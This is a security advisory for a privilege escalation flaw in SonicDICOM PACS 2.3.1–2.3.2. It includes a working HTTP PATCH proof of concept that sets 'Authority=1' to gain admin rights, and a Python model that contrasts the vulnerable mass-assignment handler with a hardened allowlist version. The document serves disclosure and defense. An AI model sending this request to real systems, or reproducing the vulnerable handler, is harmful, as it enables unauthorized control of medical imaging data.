### Summary
SonicDICOM is PACS software that combines the capabilities of a DICOM server with a web browser based DICOM viewer.
### Description
The application suffers from a privilege escalation vulnerability. A normal user can elevate his/her privileges by sending an HTTP PATCH request to the account update endpoint that sets the parameter 'Authority' to the integer value '1', gaining admin rights. The server applies the submitted 'Authority' field without checking whether the caller is allowed to change it.
### Vendor
JIUN Corporation - https://www.sonicdicom.com
### Affected Version
2.3.2 and 2.3.1
### Tested On
Microsoft-HTTPAPI/2.0
### PoC
```http
PATCH /viewer/api/accounts/update HTTP/1.1
Host: 172.19.0.214
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Escalation Browser/1.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: {REMOVED_FOR_BREVITY}
Connection: close

Id=testingus&Name=peend&Authority=1
```
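Added example, not code from the advisory or from the vendor: a minimal model of the account update handler showing the mass-assignment defect beside a hardened version that enforces an allowlist of self-editable fields server-side. The account store, the user names and the field set are constructed assumptions; only the 'Authority' parameter and the request body come from the PoC above.

```python
from urllib.parse import parse_qs

# Constructed sample store (assumption): 'Authority' 1 = admin, 0 = normal user.
def fresh_accounts():
    return {
        "testingus": {"Name": "test user", "Authority": 0},
        "admin": {"Name": "administrator", "Authority": 1},
    }

# Fields a non-admin may change on their own account; privilege fields are deliberately absent.
SELF_EDITABLE = {"Name"}
# Fields stored as integers (the privilege flag from the PoC).
INT_FIELDS = {"Authority"}

def parse_form(body: str) -> dict:
    """Parse an application/x-www-form-urlencoded PATCH body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def update_vulnerable(accounts, caller, body):
    """Vulnerable pattern: every submitted field is copied onto the target account,
    so a normal user can send Authority=1 and become admin."""
    form = parse_form(body)
    acct = accounts[form["Id"]]
    for k, v in form.items():
        if k != "Id":
            acct[k] = int(v) if k in INT_FIELDS else v
    return acct

def update_hardened(accounts, caller, body):
    """Hardened pattern: the caller's role is read from the server-side store,
    and a non-admin may only change allowlisted fields on their own account."""
    form = parse_form(body)
    target = form.get("Id")
    if target not in accounts:
        raise KeyError("unknown account")
    submitted = set(form) - {"Id"}
    caller_is_admin = accounts[caller]["Authority"] == 1
    if not caller_is_admin and (target != caller or not submitted <= SELF_EDITABLE):
        # Reject instead of silently dropping fields, so the attempt is visible in logs.
        raise PermissionError("non-admin may only edit allowlisted fields of own account")
    acct = accounts[target]
    for k in submitted:
        acct[k] = int(form[k]) if k in INT_FIELDS else form[k]
    return acct
```

A rejected PATCH that carries 'Authority' from a non-admin session is also a useful detection signal for the endpoint.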